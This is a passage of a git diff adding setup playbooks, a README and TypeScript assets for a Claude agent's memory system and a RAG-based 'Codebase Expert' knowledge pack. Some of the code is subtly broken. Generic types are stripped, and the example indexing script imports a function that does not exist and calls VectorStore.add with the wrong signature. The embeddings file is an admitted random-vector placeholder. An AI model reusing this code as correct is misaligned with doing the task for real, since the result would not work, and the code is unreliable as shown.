`.claude/scripts/` exists +- [ ] `.claude/examples/` exists + +### 2. Core Files + +Verify essential files are in place: + +- [ ] `CLAUDE.md` exists in agent root +- [ ] `.claude/VERSION` contains "1.1.0" +- [ ] `.claude/settings.json` exists and is valid JSON +- [ ] `.claude/config/config.yaml` exists and is valid YAML +- [ ] `.claude/skills/CORE/SKILL.md` exists + +### 3. Memory System + +Verify memory files: + +- [ ] `.claude/context/memory/learnings.md` exists +- [ ] `.claude/context/memory/user_preferences.md` exists +- [ ] `.claude/context/memory/work_status.md` exists + +### 4. Content Validation + +#### CLAUDE.md +- [ ] Contains agent name +- [ ] Contains persona name +- [ ] Contains mission statement +- [ ] Contains role description +- [ ] Contains memory management instructions +- [ ] Contains "Update work_status.md after EVERY conversation turn" + +#### settings.json +- [ ] Valid JSON syntax +- [ ] Contains hooks configuration +- [ ] Contains permissions + +#### CORE/SKILL.md +- [ ] Valid YAML frontmatter +- [ ] Contains triggers +- [ ] Has priority of 100 +- [ ] Has context_budget defined + +## Functional Testing + +### Test 1: Identity Check +Ask the agent: "Who are you?" + +**Expected**: Agent should respond with its persona name, role, and purpose. + +### Test 2: Memory Access +Ask the agent: "What's in your work status?" + +**Expected**: Agent should read and report from `.claude/context/memory/work_status.md`. + +### Test 3: Memory Update +Ask the agent to add a task to work status. + +**Expected**: Agent should update `.claude/context/memory/work_status.md`. + +### Test 4: Skill Activation +Ask: "What can you do?" + +**Expected**: Agent should describe its capabilities based on CORE skill. + +## Success Criteria + +Installation is successful when: + +1. All directories exist +2. All core files are present +3. Files contain valid content +4. Agent responds correctly to identity queries +5. Memory read/write operations work + +## Troubleshooting + +### Missing Directories +Re-run the mkdir command from Step 1 of implementation. + +### Invalid JSON/YAML +Check for syntax errors: +- Trailing commas in JSON +- Incorrect indentation in YAML +- Missing quotes around strings + +### Identity Not Loading +- Verify CLAUDE.md is in agent root (not in .claude/) +- Check file permissions +- Ensure no syntax errors in markdown + +### Memory Not Updating +- Verify memory directory exists +- Check file permissions +- Ensure files are not locked + +## Post-Verification + +Once verification passes: + +1. **Document completion** - Note installation date in config.yaml +2. **Test knowledge packs** - Ready to install additional knowledge packs +3. **Customize as needed** - Add agent-specific context and skills + +## Installation Complete + +The Claude Cognitive Infrastructure is now installed and operational. + +The agent has: +- Persistent memory across sessions +- Modular skill system +- Structured context management +- Event-driven hooks capability +- Complete identity configuration + +### Next Steps + +1. Run **Knowledge Pack** playbooks to add domain expertise +2. Customize CLAUDE.md with additional instructions +3. Add custom hooks for automation +4. Begin using the agent + +--- + +*Claude Cognitive Infrastructure v1.1.0* diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/0_INITIALIZE.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/0_INITIALIZE.md new file mode 100644 index 0000000..4cb454f --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/0_INITIALIZE.md @@ -0,0 +1,41 @@ +# Phase 0: Initialize + +## Objective + +Validate prerequisites for installing the Codebase Expert knowledge pack. + +## Prerequisites Checklist + +### 1. Claude Cognitive Infrastructure + +Verify the agent has Claude Cognitive Infrastructure installed: + +- [ ] `.claude/` directory exists +- [ ] `.claude/skills/` directory exists +- [ ] `.claude/context/` directory exists +- [ ] `.claude/VERSION` contains valid version + +### 2. Codebase Presence + +Verify there is a codebase to analyze: + +- [ ] Source code files exist in the agent directory +- [ ] At least one recognized language present (js, ts, py, go, etc.) + +### 3. _Core Utilities + +Verify Knowledge Packs _Core is available: + +- [ ] _Core utilities are accessible +- [ ] RAG retrieval hook can be installed + +## Validation Steps + +1. Check for `.claude/` directory +2. Scan for source code files +3. Identify primary languages +4. Verify _Core availability + +## Next Phase + +Once prerequisites are validated, proceed to **1_ANALYZE.md**. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/1_ANALYZE.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/1_ANALYZE.md new file mode 100644 index 0000000..2672750 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/1_ANALYZE.md @@ -0,0 +1,59 @@ +# Phase 1: Analyze Codebase + +## Objective + +Analyze the codebase structure to plan optimal indexing strategy. + +## Analysis Tasks + +### 1. Directory Structure + +Map the codebase structure: + +- [ ] Identify source directories (src/, lib/, etc.) +- [ ] Locate test directories +- [ ] Find configuration files +- [ ] Note documentation locations + +### 2. Language Detection + +Identify languages and frameworks: + +| Extension | Language | Framework | +|-----------|----------|-----------| +| .ts, .tsx | TypeScript | | +| .js, .jsx | JavaScript | | +| .py | Python | | +| .go | Go | | +| .rs | Rust | | +| .java | Java | | + +### 3. File Inventory + +Count files by type: + +- Source files: ___ +- Test files: ___ +- Config files: ___ +- Documentation: ___ + +### 4. Key Entry Points + +Identify important files: + +- [ ] Main entry point(s) +- [ ] Package/module definition +- [ ] Primary exports +- [ ] API definitions + +## Analysis Outputs + +Document: +1. **Languages** - Primary and secondary languages +2. **Structure** - Directory organization pattern +3. **Size** - Total files and estimated tokens +4. **Entry Points** - Key files for understanding + +## Next Phase + +Proceed to **2_PLAN_STRUCTURE.md** to plan indexing structure. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/2_PLAN_STRUCTURE.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/2_PLAN_STRUCTURE.md new file mode 100644 index 0000000..1283010 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/2_PLAN_STRUCTURE.md @@ -0,0 +1,69 @@ +# Phase 2: Plan Structure + +## Objective + +Plan the indexing and installation structure for the Codebase Expert pack. + +## Installation Structure + +``` +.claude/ +├── skills/ +│ └── Codebase-Expert/ +│ └── SKILL.md # Skill definition +├── context/ +│ └── knowledge/ +│ └── codebase/ +│ └── index.json # Codebase index metadata +└── config/ + └── knowledge-packs.yaml # Registry entry +``` + +## Indexing Strategy + +### Files to Index + +Include: +- Source code files (.ts, .js, .py, .go, etc.) +- Configuration files (package.json, tsconfig.json, etc.) +- Documentation (.md files in docs/) + +Exclude: +- node_modules/ +- .git/ +- Build outputs (dist/, build/) +- Binary files +- Large generated files + +### Chunking Strategy + +- **Code files**: Chunk by function/class +- **Config files**: Keep whole +- **Documentation**: Chunk by section + +### Embedding Plan + +- Generate embeddings for each chunk +- Store in vector store for semantic search +- Index by file path and content type + +## Skill Configuration + +```yaml +name: Codebase-Expert +version: 1.0.0 +priority: 80 +triggers: + - code + - codebase + - architecture + - implementation + - function + - class + - module +context_budget: 8000 +``` + +## Next Phase + +Proceed to **3_EVALUATE.md** to evaluate the plan. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/3_EVALUATE.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/3_EVALUATE.md new file mode 100644 index 0000000..48e7756 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/3_EVALUATE.md @@ -0,0 +1,50 @@ +# Phase 3: Evaluate Plan + +## Objective + +Evaluate the indexing plan for completeness and feasibility. + +## Evaluation Checklist + +### 1. Coverage + +- [ ] All relevant source directories included +- [ ] Important file types identified +- [ ] Exclusions are appropriate +- [ ] No sensitive files will be indexed + +### 2. Scale + +- [ ] File count is manageable +- [ ] Estimated token count within limits +- [ ] Chunking strategy appropriate for size + +### 3. Quality + +- [ ] Chunking preserves semantic meaning +- [ ] Key files prioritized +- [ ] Entry points well-covered + +### 4. Performance + +- [ ] Indexing can complete in reasonable time +- [ ] Vector store size is acceptable +- [ ] Search latency will be acceptable + +## Risk Assessment + +| Risk | Likelihood | Mitigation | +|------|------------|------------| +| Too many files | Medium | Apply stricter exclusions | +| Poor chunk quality | Low | Adjust chunking strategy | +| Large embeddings | Low | Reduce chunk size | + +## Approval Criteria + +- [ ] Coverage is comprehensive +- [ ] Scale is manageable +- [ ] No blocking issues + +## Next Phase + +If evaluation passes, proceed to **4_IMPLEMENT.md**. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/4_IMPLEMENT.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/4_IMPLEMENT.md new file mode 100644 index 0000000..c91f427 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/4_IMPLEMENT.md @@ -0,0 +1,150 @@ +# Phase 4: Implement Installation + +## Objective + +Execute the Codebase Expert knowledge pack installation. + +## Prerequisites + +> **Important**: Before proceeding, you must configure an embedding provider. The default `embeddings.ts` contains placeholder code that returns random vectors. See the assets folder for the file to configure. + +### Embedding Provider Options + +1. **OpenAI** (recommended): Set `OPENAI_API_KEY` environment variable +2. **Ollama** (local): Run `ollama pull nomic-embed-text` +3. **Other**: Modify `{{AUTORUN_FOLDER}}/assets/lib/embeddings.ts` for your provider + +## Implementation Steps + +### Step 1: Create Skill Directory + +```bash +mkdir -p .claude/skills/Codebase-Expert +``` + +### Step 2: Install SKILL.md + +Copy the skill template from `{{AUTORUN_FOLDER}}/assets/templates/skills/Codebase-Expert/SKILL.md` to: +`.claude/skills/Codebase-Expert/SKILL.md` + +### Step 3: Create Knowledge Directory + +```bash +mkdir -p .claude/context/knowledge/codebase +``` + +### Step 4: Configure Embedding Provider + +Before indexing, update `{{AUTORUN_FOLDER}}/assets/lib/embeddings.ts` with your chosen provider: + +**For OpenAI:** +```typescript +import OpenAI from 'openai'; +const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY }); + +export async function generateEmbedding(text: string): Promise { + const response = await openai.embeddings.create({ + model: 'text-embedding-3-small', + input: text, + }); + return response.data[0].embedding; +} +``` + +**For Ollama (local):** +```typescript +export async function generateEmbedding(text: string): Promise { + const response = await fetch('http://localhost:11434/api/embeddings', { + method: 'POST', + body: JSON.stringify({ model: 'nomic-embed-text', prompt: text }), + }); + return (await response.json()).embedding; +} +``` + +### Step 5: Index Codebase + +For each source file: +1. Read file content +2. Chunk appropriately (by function/class for code) +3. Generate embeddings using your configured provider +4. Store in vector store + +**Example indexing script:** + +Copy the library files from `{{AUTORUN_FOLDER}}/assets/lib/` to your hooks directory, then use: + +```typescript +import { chunkCode } from '.claude/hooks/lib/chunking'; +import { generateEmbedding } from '.claude/hooks/lib/embeddings'; +import { VectorStore } from '.claude/hooks/lib/vector-store'; + +const store = new VectorStore('codebase'); + +for (const file of sourceFiles) { + const chunks = chunkCode(file.content, file.language); + for (const chunk of chunks) { + const embedding = await generateEmbedding(chunk.text); + store.add(embedding, chunk.text, { source: file.path }); + } +} +``` + +### Step 6: Create Index Metadata + +Create `.claude/context/knowledge/codebase/index.json`: + +```json +{ + "created": "", + "files_indexed": , + "chunks": , + "languages": ["", ""], + "embedding_provider": "", + "embedding_model": "", + "last_updated": "" +} +``` + +### Step 7: Update Registry + +Add to `.claude/config/knowledge-packs.yaml`: + +```yaml +- id: codebase-expert + name: "Codebase Expert" + installed: "" + version: "1.0.0" + embedding_provider: "" + sources: + - path: ".claude/context/knowledge/codebase/" + type: "directory" + skill_path: ".claude/skills/Codebase-Expert/SKILL.md" +``` + +### Step 8: Configure RAG Hook (Optional) + +The RAG retrieval hook in `{{AUTORUN_FOLDER}}/assets/hooks/rag-retrieval.ts` is a reference implementation. Integration options: + +1. **Manual**: Query the vector store directly when you need code context +2. **MCP Server**: Implement as an MCP server for Claude integration +3. **Wrapper Script**: Run as preprocessing before Claude sessions + +## Post-Implementation + +- [ ] Verify all files created +- [ ] Test embedding generation with a sample query +- [ ] Verify vector store contains indexed chunks +- [ ] Test semantic search returns relevant results + +## Troubleshooting + +| Issue | Solution | +|-------|----------| +| Random/irrelevant results | Embedding provider not configured (still using placeholder) | +| API errors | Check API key and network connectivity | +| Empty results | Verify indexing completed and vector store has data | + +## Next Phase + +Proceed to **5_VERIFY.md** to verify installation. diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/5_VERIFY.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/5_VERIFY.md new file mode 100644 index 0000000..6245f2f --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/5_VERIFY.md @@ -0,0 +1,76 @@ +# Phase 5: Verify Installation + +## Objective + +Verify the Codebase Expert knowledge pack is correctly installed. + +## Verification Checklist + +### 1. Files Present + +- [ ] `.claude/skills/Codebase-Expert/SKILL.md` exists +- [ ] `.claude/context/knowledge/codebase/` exists +- [ ] `.claude/context/knowledge/codebase/index.json` exists + +### 2. Skill Configuration + +- [ ] SKILL.md has valid frontmatter +- [ ] Triggers include: code, codebase, architecture +- [ ] Priority is 80 +- [ ] context_budget is defined + +### 3. Index Quality + +- [ ] Files were indexed +- [ ] Chunk count is reasonable +- [ ] Languages detected correctly + +### 4. Registry Entry + +- [ ] Pack is registered in knowledge-packs.yaml +- [ ] Sources path is correct +- [ ] Skill path is correct + +## Functional Testing + +### Test 1: Code Search +Ask: "Where is the main entry point?" + +**Expected**: Agent finds and references the main entry file. + +### Test 2: Architecture +Ask: "How is the project structured?" + +**Expected**: Agent describes directory structure and organization. + +### Test 3: Functionality +Ask: "How does [specific feature] work?" + +**Expected**: Agent retrieves and explains relevant code. + +## Success Criteria + +- All files present +- Index populated +- Semantic search working +- Skill activates on triggers + +## Troubleshooting + +### No Search Results +- Verify files were indexed +- Check embedding generation +- Confirm vector store populated + +### Wrong Results +- Review chunking strategy +- Check file exclusions +- Verify language detection + +## Installation Complete + +The Codebase Expert knowledge pack is now installed. + +--- + +*Codebase Expert Knowledge Pack v1.0.0* diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/README.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/README.md new file mode 100644 index 0000000..9a00f45 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/README.md @@ -0,0 +1,64 @@ +# Codebase Expert Knowledge Pack + +Installs the Codebase Expert knowledge pack, enabling RAG-powered code understanding with semantic search across the codebase. + +## What This Pack Does + +The Codebase Expert pack gives your agent deep understanding of your codebase: + +- **Semantic Code Search** - Find relevant code by meaning, not just keywords +- **Architecture Understanding** - Understand how components connect +- **Pattern Recognition** - Identify common patterns and conventions +- **Context-Aware Assistance** - Get help that understands your specific codebase + +## Prerequisites + +- Claude Cognitive Infrastructure must be installed first +- A codebase to analyze (the agent's working directory) + +## Installation + +Run this playbook after Claude Cognitive Infrastructure is set up. The playbook will: + +1. Analyze the codebase structure +2. Index code files for semantic search +3. Install the Codebase-Expert skill +4. Configure RAG retrieval hooks + +## After Installation + +The agent will automatically: +- Retrieve relevant code context when answering questions +- Understand the codebase architecture +- Reference specific files and functions in responses + +## Skill Triggers + +The Codebase-Expert skill activates on queries about: +- Code structure and architecture +- Finding specific functionality +- Understanding how components work +- Debugging and troubleshooting + +## Assets + +This playbook includes the following assets in the `assets/` folder: + +| Asset | Purpose | +|-------|---------| +| `hooks/rag-retrieval.ts` | Pre-tool hook for context injection | +| `lib/embeddings.ts` | Text embedding generation (placeholder - configure provider) | +| `lib/vector-store.ts` | Vector storage for semantic search | +| `lib/chunking.ts` | Document chunking strategies | +| `lib/registry.ts` | Knowledge pack registration | +| `templates/skills/Codebase-Expert/SKILL.md` | Skill definition template | + +Reference assets using `{{AUTORUN_FOLDER}}/assets/` in playbook documents. + +### Configuration Required + +The `embeddings.ts` file contains a **placeholder implementation**. You must configure an actual embedding provider (OpenAI, Ollama, etc.) for semantic search to work. See the file comments for configuration examples. + +--- + +*Codebase Expert Knowledge Pack v1.0.0* diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/hooks/rag-retrieval.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/hooks/rag-retrieval.ts new file mode 100644 index 0000000..3800894 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/hooks/rag-retrieval.ts @@ -0,0 +1,128 @@ +/** + * RAG Retrieval Hook + * + * Pre-tool hook that retrieves relevant context from knowledge packs + * and injects it into the conversation before tool execution. + */ + +import { VectorStore } from '../lib/vector-store'; +import { Registry } from '../lib/registry'; +import { generateEmbedding } from '../lib/embeddings'; + +interface HookContext { + toolName: string; + toolInput: Record; + conversationHistory: Array<{ role: string; content: string }>; +} + +interface RetrievalResult { + content: string; + source: string; + score: number; +} + +/** + * Configuration for the RAG retrieval hook + */ +const config = { + maxResults: 5, + minScore: 0.7, + contextBudget: 4000, +}; + +/** + * Extract the current query/intent from conversation + */ +function extractQuery(context: HookContext): string { + const lastUserMessage = context.conversationHistory + .filter(m => m.role === 'user') + .pop(); + + return lastUserMessage?.content || ''; +} + +/** + * Retrieve relevant context from registered knowledge packs + */ +async function retrieveContext(query: string): Promise { + const registry = Registry.getInstance(); + const activePacks = registry.getActivePacks(); + + if (activePacks.length === 0) { + return []; + } + + const queryEmbedding = await generateEmbedding(query); + const results: RetrievalResult[] = []; + + for (const pack of activePacks) { + const vectorStore = VectorStore.forPack(pack.id); + const packResults = await vectorStore.search(queryEmbedding, { + limit: config.maxResults, + minScore: config.minScore, + }); + + results.push(...packResults.map(r => ({ + content: r.content, + source: `${pack.name}: ${r.metadata?.source || 'unknown'}`, + score: r.score, + }))); + } + + // Sort by score and limit to budget + return results + .sort((a, b) => b.score - a.score) + .slice(0, config.maxResults); +} + +/** + * Format retrieved context for injection + */ +function formatContext(results: RetrievalResult[]): string { + if (results.length === 0) { + return ''; + } + + const contextParts = results.map(r => + `[Source: ${r.source}]\n${r.content}` + ); + + return ` + +The following context was retrieved from knowledge packs and may be relevant: + +${contextParts.join('\n\n---\n\n')} + +`; +} + +/** + * Main hook function - called before tool execution + */ +export async function preToolCall(context: HookContext): Promise { + // Only inject context for certain tools + const contextualTools = ['Read', 'Write', 'Edit', 'Bash']; + + if (!contextualTools.includes(context.toolName)) { + return null; + } + + try { + const query = extractQuery(context); + if (!query) { + return null; + } + + const results = await retrieveContext(query); + if (results.length === 0) { + return null; + } + + return formatContext(results); + } catch (error) { + console.error('RAG retrieval error:', error); + return null; + } +} + +export default { preToolCall }; diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/chunking.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/chunking.ts new file mode 100644 index 0000000..5446af2 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/chunking.ts @@ -0,0 +1,199 @@ +/** + * Document Chunking + * + * Strategies for splitting documents into chunks for embedding. + */ + +interface Chunk { + content: string; + index: number; + metadata?: { + startLine?: number; + endLine?: number; + source?: string; + }; +} + +interface ChunkingOptions { + maxChunkSize?: number; + overlap?: number; + preserveParagraphs?: boolean; +} + +const defaultOptions: ChunkingOptions = { + maxChunkSize: 1000, + overlap: 100, + preserveParagraphs: true, +}; + +/** + * Split text into chunks by character count + */ +export function chunkBySize( + text: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize, overlap } = { ...defaultOptions, ...options }; + const chunks: Chunk[] = []; + + let start = 0; + let index = 0; + + while (start < text.length) { + const end = Math.min(start + maxChunkSize!, text.length); + + chunks.push({ + content: text.slice(start, end), + index, + }); + + start = end - overlap!; + index++; + } + + return chunks; +} + +/** + * Split text into chunks by paragraph + */ +export function chunkByParagraph( + text: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize } = { ...defaultOptions, ...options }; + const paragraphs = text.split(/\n\n+/); + const chunks: Chunk[] = []; + + let currentChunk = ''; + let index = 0; + + for (const paragraph of paragraphs) { + if (currentChunk.length + paragraph.length > maxChunkSize!) { + if (currentChunk) { + chunks.push({ + content: currentChunk.trim(), + index, + }); + index++; + } + currentChunk = paragraph; + } else { + currentChunk += (currentChunk ? '\n\n' : '') + paragraph; + } + } + + if (currentChunk) { + chunks.push({ + content: currentChunk.trim(), + index, + }); + } + + return chunks; +} + +/** + * Split code into chunks by function/class + */ +export function chunkByCodeBlock( + code: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize } = { ...defaultOptions, ...options }; + const chunks: Chunk[] = []; + + // Simple regex-based splitting for common patterns + const patterns = [ + /^(export\s+)?(async\s+)?function\s+\w+/gm, + /^(export\s+)?class\s+\w+/gm, + /^(export\s+)?const\s+\w+\s*=/gm, + ]; + + const lines = code.split('\n'); + let currentChunk: string[] = []; + let startLine = 0; + let index = 0; + + for (let i = 0; i < lines.length; i++) { + const line = lines[i]; + const isBlockStart = patterns.some(p => p.test(line)); + + if (isBlockStart && currentChunk.length > 0) { + const content = currentChunk.join('\n'); + if (content.trim()) { + chunks.push({ + content, + index, + metadata: { startLine, endLine: i - 1 }, + }); + index++; + } + currentChunk = []; + startLine = i; + } + + currentChunk.push(line); + + // Force split if chunk is too large + if (currentChunk.join('\n').length > maxChunkSize!) { + chunks.push({ + content: currentChunk.join('\n'), + index, + metadata: { startLine, endLine: i }, + }); + index++; + currentChunk = []; + startLine = i + 1; + } + } + + if (currentChunk.length > 0) { + const content = currentChunk.join('\n'); + if (content.trim()) { + chunks.push({ + content, + index, + metadata: { startLine, endLine: lines.length - 1 }, + }); + } + } + + return chunks; +} + +/** + * Smart chunking that detects content type + */ +export function smartChunk( + content: string, + options: ChunkingOptions = {} +): Chunk[] { + // Detect if content looks like code + const codeIndicators = [ + /^import\s+/m, + /^export\s+/m, + /function\s+\w+\s*\(/, + /class\s+\w+/, + /const\s+\w+\s*=/, + ]; + + const isCode = codeIndicators.some(p => p.test(content)); + + if (isCode) { + return chunkByCodeBlock(content, options); + } + + if (options.preserveParagraphs) { + return chunkByParagraph(content, options); + } + + return chunkBySize(content, options); +} + +export default { + chunkBySize, + chunkByParagraph, + chunkByCodeBlock, + smartChunk, +}; diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/embeddings.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/embeddings.ts new file mode 100644 index 0000000..a4a706d --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/embeddings.ts @@ -0,0 +1,120 @@ +/** + * Embeddings Generation + * + * Generates text embeddings for semantic search capabilities. + * + * ⚠️ CONFIGURATION REQUIRED ⚠️ + * + * This file contains a PLACEHOLDER implementation that returns random vectors. + * You MUST replace generateEmbedding() with a real embedding provider: + * + * Option 1: OpenAI (recommended) + * ``` + * import OpenAI from 'openai'; + * const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY }); + * + * export async function generateEmbedding(text: string): Promise { + * const response = await openai.embeddings.create({ + * model: 'text-embedding-3-small', + * input: text, + * }); + * return response.data[0].embedding; + * } + * ``` + * + * Option 2: Ollama (local) + * ``` + * export async function generateEmbedding(text: string): Promise { + * const response = await fetch('http://localhost:11434/api/embeddings', { + * method: 'POST', + * body: JSON.stringify({ model: 'nomic-embed-text', prompt: text }), + * }); + * return (await response.json()).embedding; + * } + * ``` + * + * See _Core/README.md for more options. + */ + +interface EmbeddingConfig { + model: string; + dimensions: number; + batchSize: number; +} + +const defaultConfig: EmbeddingConfig = { + model: 'text-embedding-3-small', + dimensions: 1536, + batchSize: 100, +}; + +/** + * Generate embedding for a single text + * + * ⚠️ PLACEHOLDER - Returns random vectors! + * Replace this function with a real embedding provider. + */ +export async function generateEmbedding( + text: string, + config: Partial = {} +): Promise { + const finalConfig = { ...defaultConfig, ...config }; + + // ⚠️ PLACEHOLDER IMPLEMENTATION - REPLACE ME! + // This returns random vectors which will NOT provide meaningful semantic search. + // See the file header comments for implementation examples. + console.warn( + '⚠️ embeddings.ts: Using placeholder implementation. ' + + 'Configure a real embedding provider for semantic search to work.' + ); + return new Array(finalConfig.dimensions).fill(0).map(() => Math.random()); +} + +/** + * Generate embeddings for multiple texts + */ +export async function generateEmbeddings( + texts: string[], + config: Partial = {} +): Promise { + const finalConfig = { ...defaultConfig, ...config }; + const results: number[][] = []; + + // Process in batches + for (let i = 0; i < texts.length; i += finalConfig.batchSize) { + const batch = texts.slice(i, i + finalConfig.batchSize); + const batchResults = await Promise.all( + batch.map(text => generateEmbedding(text, config)) + ); + results.push(...batchResults); + } + + return results; +} + +/** + * Calculate cosine similarity between two embeddings + */ +export function cosineSimilarity(a: number[], b: number[]): number { + if (a.length !== b.length) { + throw new Error('Embeddings must have same dimensions'); + } + + let dotProduct = 0; + let normA = 0; + let normB = 0; + + for (let i = 0; i < a.length; i++) { + dotProduct += a[i] * b[i]; + normA += a[i] * a[i]; + normB += b[i] * b[i]; + } + + return dotProduct / (Math.sqrt(normA) * Math.sqrt(normB)); +} + +export default { + generateEmbedding, + generateEmbeddings, + cosineSimilarity, +}; diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/registry.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/registry.ts new file mode 100644 index 0000000..279e1d4 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/registry.ts @@ -0,0 +1,114 @@ +/** + * Knowledge Pack Registry + * + * Manages registration and discovery of installed knowledge packs. + */ + +interface KnowledgePack { + id: string; + name: string; + version: string; + installed: string; + sources: Array<{ + path: string; + type: 'file' | 'directory' | 'embedded'; + }>; + skillPath?: string; + metadata?: Record; +} + +interface RegistryConfig { + configPath: string; +} + +/** + * Singleton registry for knowledge packs + */ +export class Registry { + private static instance: Registry; + private packs: Map = new Map(); + private configPath: string; + + private constructor(config: RegistryConfig) { + this.configPath = config.configPath; + } + + /** + * Get the singleton instance + */ + static getInstance(config?: RegistryConfig): Registry { + if (!Registry.instance) { + Registry.instance = new Registry(config || { + configPath: '.claude/config/knowledge-packs.yaml' + }); + } + return Registry.instance; + } + + /** + * Register a new knowledge pack + */ + register(pack: KnowledgePack): void { + this.packs.set(pack.id, pack); + this.persist(); + } + + /** + * Unregister a knowledge pack + */ + unregister(packId: string): boolean { + const result = this.packs.delete(packId); + if (result) { + this.persist(); + } + return result; + } + + /** + * Get a specific pack by ID + */ + getPack(packId: string): KnowledgePack | undefined { + return this.packs.get(packId); + } + + /** + * Get all registered packs + */ + getAllPacks(): KnowledgePack[] { + return Array.from(this.packs.values()); + } + + /** + * Get active (non-disabled) packs + */ + getActivePacks(): KnowledgePack[] { + return this.getAllPacks().filter( + pack => pack.metadata?.disabled !== true + ); + } + + /** + * Check if a pack is installed + */ + isInstalled(packId: string): boolean { + return this.packs.has(packId); + } + + /** + * Load registry from config file + */ + async load(): Promise { + // Implementation would read from YAML config + // Placeholder for actual file system operations + } + + /** + * Persist registry to config file + */ + private persist(): void { + // Implementation would write to YAML config + // Placeholder for actual file system operations + } +} + +export default Registry; diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/vector-store.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/vector-store.ts new file mode 100644 index 0000000..ec6880b --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/vector-store.ts @@ -0,0 +1,143 @@ +/** + * Vector Store + * + * In-memory vector storage for semantic search. + */ + +import { cosineSimilarity } from './embeddings'; + +interface VectorEntry { + id: string; + content: string; + embedding: number[]; + metadata?: Record; +} + +interface SearchResult { + id: string; + content: string; + score: number; + metadata?: Record; +} + +interface SearchOptions { + limit?: number; + minScore?: number; + filter?: (entry: VectorEntry) => boolean; +} + +/** + * Vector store for a single knowledge pack + */ +export class VectorStore { + private static stores: Map = new Map(); + + private packId: string; + private entries: Map = new Map(); + + private constructor(packId: string) { + this.packId = packId; + } + + /** + * Get or create a vector store for a pack + */ + static forPack(packId: string): VectorStore { + if (!VectorStore.stores.has(packId)) { + VectorStore.stores.set(packId, new VectorStore(packId)); + } + return VectorStore.stores.get(packId)!; + } + + /** + * Add an entry to the store + */ + add(entry: VectorEntry): void { + this.entries.set(entry.id, entry); + } + + /** + * Add multiple entries + */ + addAll(entries: VectorEntry[]): void { + for (const entry of entries) { + this.add(entry); + } + } + + /** + * Remove an entry + */ + remove(id: string): boolean { + return this.entries.delete(id); + } + + /** + * Search for similar entries + */ + async search( + queryEmbedding: number[], + options: SearchOptions = {} + ): Promise { + const { + limit = 10, + minScore = 0.0, + filter, + } = options; + + const results: SearchResult[] = []; + + for (const entry of this.entries.values()) { + // Apply filter if provided + if (filter && !filter(entry)) { + continue; + } + + const score = cosineSimilarity(queryEmbedding, entry.embedding); + + if (score >= minScore) { + results.push({ + id: entry.id, + content: entry.content, + score, + metadata: entry.metadata, + }); + } + } + + // Sort by score descending and limit + return results + .sort((a, b) => b.score - a.score) + .slice(0, limit); + } + + /** + * Get store size + */ + size(): number { + return this.entries.size; + } + + /** + * Clear all entries + */ + clear(): void { + this.entries.clear(); + } + + /** + * Persist store to disk + */ + async persist(path: string): Promise { + // Implementation would serialize and write to disk + } + + /** + * Load store from disk + */ + async load(path: string): Promise { + // Implementation would read and deserialize from disk + } +} + +export default VectorStore; diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/templates/skills/Codebase-Expert/SKILL.md 